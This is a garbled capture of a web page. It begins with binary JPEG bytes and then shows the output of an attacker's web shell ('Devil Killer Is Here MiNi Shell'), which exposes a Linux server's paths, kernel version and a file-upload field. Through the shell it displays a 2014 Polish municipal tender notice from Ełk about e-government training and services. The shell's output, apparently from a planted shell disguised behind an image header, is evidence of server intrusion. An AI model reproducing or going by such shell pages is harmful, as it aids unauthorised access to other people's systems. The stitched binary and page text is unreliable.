JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140725/250140-N-2014.html

<p class="kh_header"><b>Ełk: Organizacja i przeprowadzenie szkoleń, przygotowanie i wdrożenie pakietu e-usług samorządowych, uruchomienie punktów potwierdzania profili zaufanych oraz uruchomienie zautomatyzowanych e-usług budżetowych dla mieszkańców w ramach realizacji projektu Przyjazne e-urzędy na Warmii i Mazurach dofinansowanego z Unii Europejskiej i budżetu państwa w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej.</b><br>
<b>Numer ogłoszenia: 250140 - 2014; data zamieszczenia: 25.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Ełk , ul. M. J. Piłsudskiego 4, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 73 26 200, faks 087 73 26 230.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń, przygotowanie i wdrożenie pakietu e-usług samorządowych, uruchomienie punktów potwierdzania profili zaufanych oraz uruchomienie zautomatyzowanych e-usług budżetowych dla mieszkańców w ramach realizacji projektu Przyjazne e-urzędy na Warmii i Mazurach dofinansowanego z Unii Europejskiej i budżetu państwa w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamawiający organizuje przetarg w ramach realizacji projektu Przyjazne e-urzędy na Warmii i Mazurach dofinansowanego z Unii Europejskiej i budżetu państwa w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej, występując w roli Lidera partnerstwa zawartego na potrzeby realizacji projektu.
2.	Zamawiający organizuje przetarg zgodnie z porozumieniem zawartym w dniu 16 lipca 2014 r. w imieniu i na rzecz innych jednostek samorządu terytorialnego zgodnie z art. 16 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907, 984, 1047, 1473, 423), tj:
a.	Gmina Kętrzyn, ul. Tadeusza Kościuszki 2, 11-400 Kętrzyn;
b.	Gmina Łukta, ul. Mazurska 2, 14-105 Łukta;
c.	Gmina Miłakowo, ul. Olsztyńska 16, 14-310 Miłakowo;
d.	Gmina Morąg, ul. 11 Listopada 9, 14-300 Morąg;
e.	Gmina Olsztynek, ul. Ratusz 1, 11-015 Olsztynek;
f.	Gmina Górowo Iławeckie, ul. Plac Ratuszowy 18, 11-220 Górowo Iławeckie.
3.	Zamawiający na potrzeby wyróżnienia działań merytorycznych podejmowanych na rzecz poszczególnych podmiotów uczestniczących w partnerstwie stosuje w niniejszej SIWZ skróty określające poszczególne jednostki samorządu terytorialnego zgodnie z poniższym:
a.	Gmina Kętrzyn, ul. Tadeusza Kościuszki 2, 11-400 Kętrzyn - P1;
b.	Gmina Łukta, ul. Mazurska 2, 14-105 Łukta - P2;
c.	Gmina Miłakowo, ul. Olsztyńska 16, 14-310 Miłakowo - P3;
d.	Gmina Morąg, ul. 11 Listopada 9, 14-300 Morąg - P4;
e.	Gmina Olsztynek, ul. Ratusz 1, 11-015 Olsztynek - P5;
f.	Gmina Górowo Iławeckie, ul. Plac Ratuszowy 18, 11-220 Górowo Iławeckie - P6;
g.	Miasto Ełk, ul. Piłsudskiego 4, 19-300 Ełk - Lider (L).

4.	Na przedmiot zamówienia składa się wykonanie następujących elementów zamówienia:

1) Promocja e-Usług wśród obywateli.
- Przeprowadzenie seminariów informacyjnych dla mieszkańców: Lider (2 godz. x 40 seminariów = 80 godzin) - jednostka miary - 80 h, 
- Przeprowadzenie seminariów informacyjnych dla mieszkańców: P2 (2 godz. x 26 seminariów = 52 godziny) - jednostka miary - 52 h.

2) Organizacja i przeprowadzenie szkoleń.
- Dokument elektroniczny - istota, cechy, aspekty prawne: Lider (8 godz. x 5 gr. x 10 os./gr. = 40 godz.) - jednostka miary - 50 osób,
- Pakiety biurowe w pracy urzędnika: Lider (64 godz. x 2 gr. x 10 os./gr. = 128 godz.) - jednostka miary - 20 osób,
- Dokument elektroniczny - istota, cechy, aspekty prawne: P1 (8 godz. x 2 gr. x 11 os./gr. = 16 godz.) - jednostka miary - 22 osoby,
- Pakiety biurowe w pracy urzędnika: P1 (64 godz. x 2 gr. x 10 os./gr. = 128 godz.) - jednostka miary - 20 osób,
- Bezpieczeństwo informacji w ICT: P1 (16 godz. x 2 gr. x 11 os./gr. = 32 godz.) - jednostka miary - 22 osoby,
- Zastosowanie i posługiwanie się podpisem elektronicznym i profilem zaufanym: P1 (8 godz. x 2 gr. x 11 os./gr. = 16 godz.) - jednostka miary - 22 osoby,
- Ochrona danych osobowych i jej funkcjonowanie w systemach informatycznych: P1 (16 godz. x 1 gr. x 8 os./gr. = 16 godz.)  - jednostka miary - 8 osób,
- Bezpieczeństwo informacji w ICT: P2-P5 (16 godz. x 1 gr. x 12 os./gr. = 16 godz.) - jednostka miary - 12 osób,
- Zastosowanie i posługiwanie się podpisem elektronicznym i profilem zaufanym: P2,P4,P5 (8 godz. x 1 gr. x 9 os./gr. = 8 godz.)  - jednostka miary - 9 osób,
- Dokument elektroniczny - istota, cechy, aspekty prawne: P3 (8 godz. x 2 gr. x 11 os./gr. = 16 godz.) - jednostka miary - 22 osoby, 
- Pakiety biurowe w pracy urzędnika: P3 (64 godz. x 1 gr. x 10 os./gr. = 64 godz.) - jednostka miary - 10 osób,
- Zastosowanie i posługiwanie się podpisem elektronicznym i profilem zaufanym: P3 (8 godz. x 1 gr. x 10 os./gr. = 8 godz.)- jednostka miary - 10 osób,
- Ochrona danych osobowych i jej funkcjonowanie w systemach informatycznych: P3,P2 (16 godz. x 2 gr. x 10 os./gr. = 32 godz.) - jednostka miary - 20 osób,
- Dokument elektroniczny - istota, cechy, aspekty prawne: P4,P2 (8 godz. x 6 gr. x 10 os./gr. = 48 godz.)- jednostka miary - 60 osób,
- Pakiety biurowe w pracy urzędnika: P4,P2 (64 godz. x 3 gr. x 10 os./gr. = 192 godz.) - jednostka miary - 30 osób,
- Ochrona danych osobowych i jej funkcjonowanie w systemach informatycznych: P4 (16 godz. x 6 gr. x 10 os./gr. = 96 godz.) - jednostka miary - 60 osób,
- Dokument elektroniczny - istota, cechy, aspekty prawne: P5 (8 godz. x 3 gr. x 11 os./gr. = 24 godz.) - jednostka miary - 33 osoby,
- Pakiety biurowe w pracy urzędnika: P5 (64 godz. x 3 gr. x 11 os./gr. = 192 godz.) - jednostka miary - 30 osób,
- Ochrona danych osobowych i jej funkcjonowanie w systemach informatycznych: P5 (16 godz. x 1 gr. x 7 os./gr. = 16 godz.)- jednostka miary - 7 osób,
- Dokument elektroniczny - istota, cechy, aspekty prawne: P6 (8 godz. x 1 gr. x 5 os./gr. = 8 godz.) - jednostka miary - 5 osób,
- Pakiety biurowe w pracy urzędnika: P6 (64 godz. x 1 gr. x 5 os./gr. = 64 godz.) - jednostka miary - 5 osób,
- Bezpieczeństwo informacji w ICT: P6 (16 godz. x 1 gr. x 4 os./gr. = 16 godz.) - jednostka miary - 4 osoby, 
- Zastosowanie i posługiwanie się podpisem elektronicznym i profilem zaufanym: P6 (8 godz. x 1 gr. x 4 os./gr. = 8 godz.)- jednostka miary - 4 osoby.

3)  Wdrożenie pakietu e-usług samorządowych.
- Audyt obecnie istniejących procedur i dokumentów dotyczących elektronizowanych e-usług: L, P1-P6 - jednostka miary - 150 godzin,
- Przygotowanie ustandaryzowanych projektów dokumentów niezbędnych przy świadczeniu e-usług: L, P1-P6 - jednostka miary - 100 godzin,
- Przygotowanie projektów dokumentacji zgłoszeniowej wszystkich e-usług: L, P1-P6- jednostka miary - 100 godzin,
- Dostosowanie formularzy e-usług pobranych z repozytorium dokumentów ePUAP: L, P1-P6 - jednostka miary - 20 sztuk, 
- Konfiguracja ESP na ePUAP w zakresie świadczonych e-usług: Lider - jednostka miary - 10 godzin,
- Konfiguracja ESP na ePUAP w zakresie świadczonych e-usług: P1 - jednostka miary - 10 godzin,
- Konfiguracja ESP na ePUAP w zakresie świadczonych e-usług: P2 - jednostka miary - 10 godzin,
- Konfiguracja ESP na ePUAP w zakresie świadczonych e-usług: P3 - jednostka miary - 10 godzin,
- Konfiguracja ESP na ePUAP w zakresie świadczonych e-usług: P4 - jednostka miary - 10 godzin,
- Konfiguracja ESP na ePUAP w zakresie świadczonych e-usług: P5 - jednostka miary - 10 godzin,
- Konfiguracja ESP na ePUAP w zakresie świadczonych e-usług: P6 - jednostka miary - 10 godzin,
- Szkolenia informacyjne dla osób zaangażowanych w realizację e-usług: Lider (3 godz. x 2 gr. x 10 os./gr. = 6 godz.) - jednostka miary - 20 osób,
- Szkolenia informacyjne dla osób zaangażowanych w realizację e-usług: P1 (3 godz. x 2 gr. x 10 os./gr. = 6 godz.) - jednostka miary - 20 osób,
- Szkolenia informacyjne dla osób zaangażowanych w realizację e-usług: P2 (3 godz. x 1 gr. x 5 os./gr. = 3 godz.) - jednostka miary - 5 osób,
- Szkolenia informacyjne dla osób zaangażowanych w realizację e-usług: P3 (3 godz. x 1 gr. x 10 os./gr. = 3 godz.) - jednostka miary - 10 osób,
- Szkolenia informacyjne dla osób zaangażowanych w realizację e-usług: P4 (3 godz. x 2 gr. x 10 os./gr. = 6 godz.) - jednostka miary - 20 osób,
- Szkolenia informacyjne dla osób zaangażowanych w realizację e-usług: P5 (3 godz. x 1 gr. x 15 os./gr. = 3 godz.) - jednostka miary - 15 osób,
- Szkolenia informacyjne dla osób zaangażowanych w realizację e-usług: P6 (3 godz. x 1 gr. x 8 os./gr. = 3 godz.) - jednostka miary - 8 osób.

4) Uruchomienie punktów potwierdzania profili zaufanych.
- Stworzenie projektów procedur zarządzania profilami zaufanymi: L, P1-P6 - jednostka miary - 150 godzin,
- Stworzenie projektów aktualizacji wewnętrznych procedur i regulaminów: L, P1-P6 - jednostka miary - 120 godzin,
- Stworzenie projektów aktualizacji procedur ochrony danych osobowych: L, P1-P6 - jednostka miary - 120 godzin,
- Stworzenie projektów aktualizacji instrukcji zarządzania systemem informatycznym: L, P1-P6 - jednostka miary - 120 godzin,
- Szkolenie administratorów platformy ePUAP: L,P1-P6 - jednostka miary - 14 osób,
- Szkolenie osób wydających profil zaufany: L,P1-P6 - jednostka miary - 20 osób.
5) Uruchomienie zautomatyzowanych e-usług budżetowych dla mieszkańców.
- Opracowanie projektów procedur, regulaminów i zarządzeń dla wdrażanych e-usług: L, P1-P6 - jednostka miary - 1 usługa,
- Opracowanie formularza dla e-usług budżetowych na ePUAP: L, P1-P6 - jednostka miary - 4 sztuki,
- Zakup licencji zintegrowanego z ePUAP systemu broker informacji: Lider - jednostka miary - 1 sztuka,
- Zakup licencji systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: Lider- jednostka miary - 1 sztuka,
- Wdrożenie systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: Lider- jednostka miary - 1 usługa,
- Szkolenia - system dziedzinowy wspierający świadczenie e-usług budżetowych: Lider (96 godz. x 1 gr. x 12 os./gr. = 96 godz.)- jednostka miary - 12 osób,
- Zakup licencji zintegrowanego z ePUAP systemu broker informacji: P1- jednostka miary - 1 sztuka,
- Zakup licencji systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P1- jednostka miary - 1 sztuka,
- Wdrożenie systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P1- jednostka miary - 1 usługa,
- Szkolenia - system dziedzinowy wspierający świadczenie e-usług budżetowych: P1 (96 godz. x 1 gr. x 12 os./gr. = 96 godz.) [P1]- jednostka miary - 12 osób,
- Zakup licencji zintegrowanego z ePUAP systemu broker informacji: P2- jednostka miary - 1 sztuka,
- Zakup licencji systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P2- jednostka miary - 1 sztuka,
- Wdrożenie systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P2- jednostka miary - 1 usługa,
- Szkolenia - system dziedzinowy wspierający świadczenie e-usług budżetowych: P2 (96 godz. x 1 gr. x 5 os./gr. = 96 godz.)- jednostka miary - 5 osób,
- Zakup licencji zintegrowanego z ePUAP systemu broker informacji: P3- jednostka miary - 1 sztuka,
- Zakup licencji systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P3- jednostka miary - 1 sztuka,
- Wdrożenie systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P3- jednostka miary - 1 usługa,
- Szkolenia - system dziedzinowy wspierający świadczenie e-usług budżetowych: P3 (96 godz. x 1 gr. x 5 os./gr. = 96 godz.)- jednostka miary - 5 osób,
- Zakup licencji zintegrowanego z ePUAP systemu broker informacji: P4 - jednostka miary - 1 sztuka,
- Zakup licencji systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P4 - jednostka miary - 1 sztuka, 
- Wdrożenie systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P4 - jednostka miary - 1 sztuka,
- Szkolenia - system dziedzinowy wspierający świadczenie e-usług budżetowych: P4 (96 godz. x 1 gr. x 5 os./gr. = 96 godz.) - jednostka miary - 5 osób,
- Zakup licencji zintegrowanego z ePUAP systemu broker informacji: P5 - jednostka miary - 1 sztuka,
- Zakup licencji systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P5 - jednostka miary - 1 sztuka,
- Wdrożenie systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P5- jednostka miary - 1 usługa,
- Szkolenia - system dziedzinowy wspierający świadczenie e-usług budżetowych: P5 (96 godz. x 1 gr. x 5 os./gr. = 96 godz.) - jednostka miary - 5 osób,
- Zakup licencji zintegrowanego z ePUAP systemu broker informacji: P6 - jednostka miary - 1 sztuka,
- Zakup licencji systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P6 - jednostka miary - 1 sztuka,
- Wdrożenie systemu dziedzinowego wspierającego świadczenie e-usług budżetowych: P6 - jednostka miary - 1 usługa,
- Szkolenia - system dziedzinowy wspierający świadczenie e-usług budżetowych: P6 (96 godz. x 1 gr. x 5 os./gr. = 96 godz.) - jednostka miary - 5 osób,

Szczegółowy przedmiot zamówienia stanowi Szczegółowa Specyfikacja Techniczna stanowiąca załącznik nr 7 do SIWZ.

5.	Realizacja zadania odbywać się będzie z uwzględnieniem harmonogramu prac stanowiący załącznik nr 8 do SIWZ. Ostateczny termin realizacji zamówienia: 31.07.2015 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.32.20.00-8, 72.23.20.00-0, 72.22.00.00-3, 72.24.60.00-1, 72.26.60.00-7, 72.26.30.00-6, 72.26.50.00-0, 72.26.80.00-1, 72.31.00.00-1, 80.50.00.00-9, 80.53.31.00-0, 80.51.00.00-2, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 20 000,00 PLN (dwadzieścia  tysięcy zł) przed upływem
terminu składania ofert.
Wadium może być wniesione w następujących formach:
- w pieniądzu
- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- w gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielonych przez podmioty, o których mowa w art. 6.b. ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2007r.
Nr 42, poz 275).

Wadium wnoszone w pieniądzu należy wpłacić przelewem na poniższy rachunek bankowy zamawiającego:
85 1020 4724 0000 3102 0038 8538 (konto Urzędu Miasta Ełku w PKO BP S.A.).

Uwaga!
Dokumenty dotyczące wadium winne być dołączone do oferty jako kserokopia potwierdzona za zgodność z oryginałem, a oryginał w oddzielnej kopercie dołączonej do oferty w sposób umożliwiający jej zwrot wykonawcy bez dekompletowania oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust 1. 

Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się posiadaniem udokumentowanego doświadczenia z wykonania, w ciągu ostatnich 3 lat przed upływem terminu składania ofert (a jeśli okres działalności jest krótszy, w tym okresie), co najmniej dwóch usług, przedmiotem których było wykonanie (wraz z instalacją, konfiguracją i szkoleniem) zintegrowanej platformy informacyjnej, posiadającej narzędzia zdalnej interakcji i masowej komunikacji dostępnej online, a wdrożenie platformy obejmowało nie mniej niż 150 użytkowników w każdej usłudze, a wartość każdej usługi wynosiła nie mniej niż 500 000 złotych brutto;

Uwaga: Jeżeli wykazywane usługi będą potwierdzać wysokość tych usług w walucie innej niż PLN, Zamawiający dokona przeliczenia tej wartości na PLN wg średniego kursu NBP z dnia, w którym ogłoszenie o zamówieniu zostało opublikowane w Biuletynie Zamówień Publicznych.

Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust 1. 

Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże się posiadaniem do dyspozycji osób zdolnych do wykonania zamówienia tj.:
a.	co najmniej jedną osobą posiadającą wykształcenie wyższe, posiadającą minimum 3 letnie doświadczenie w kierowaniu projektami związanymi z informatyzacją, a w tym czasie kierowała co najmniej dwoma projektami informatycznymi o wartości minimum 500 000 zł brutto każdy,
b.	co najmniej jedną osobą, posiadającą wykształcenie wyższe informatyczne, posiadającą minimum 3 letnie doświadczenie w realizacji projektów związanych z informatyzacją,
c.	co najmniej jedną osobą posiadającą wykształcenie wyższe informatyczne, posiadającą minimum 2 letnie doświadczenie w realizacji projektów związanych z informatyzacją,
d.	co najmniej dwiema osobami posiadającymi wykształcenie wyższe, posiadającymi minimum 2 letnie doświadczenie w realizacji projektów związanych z informatyzacją;
e.	co najmniej jedną osobą posiadającą wykształcenie wyższe, posiadającą doświadczenie w przeprowadzeniu co najmniej 2 szkoleń w obszarze: Dokument elektroniczny - istota, cechy, aspekty prawne; 
f.	co najmniej jedną osobą posiadającą wykształcenie wyższe, posiadającą doświadczenie w przeprowadzeniu co najmniej 2 szkoleń w obszarze: Pakiety biurowe w pracy urzędnika; 
g.	co najmniej jedną osobą posiadającą wykształcenie wyższe, posiadającą doświadczenie w przeprowadzeniu co najmniej 2 szkoleń w obszarze: Bezpieczeństwo informacji w ICT;
h.	co najmniej jedną osobą posiadającą wykształcenie wyższe, posiadającą doświadczenie w przeprowadzeniu co najmniej 2 szkoleń w obszarze: Zastosowanie i posługiwanie się podpisem elektronicznym i profilem zaufanym;
i.	co najmniej jedną osobą posiadającą wykształcenie wyższe, posiadającą doświadczenie w przeprowadzeniu co najmniej 2 szkoleń w obszarze: Ochrona danych osobowych i jej funkcjonowanie w systemach informatycznych;
j.	co najmniej dwiema osobami posiadającymi wykształcenie wyższe, posiadającymi doświadczenie w realizacji co najmniej dwóch usług polegających na analizie, opracowaniu i wdrażaniu procedur, projektów dokumentów.
Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się posiadaniem środków finansowych lub zdolności kredytowej w wysokości min. 500 000,00  PLN.

Uwaga: Jeżeli posiadane środki finansowe lub zdolność kredytowa wykazywana będzie w walucie innej niż PLN, Zamawiający dokona przeliczenia ich na PLN wg średniego kursu NBP z dnia, w którym ogłoszenie o zamówieniu zostało opublikowane w Biuletynie Zamówień Publicznych.

Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

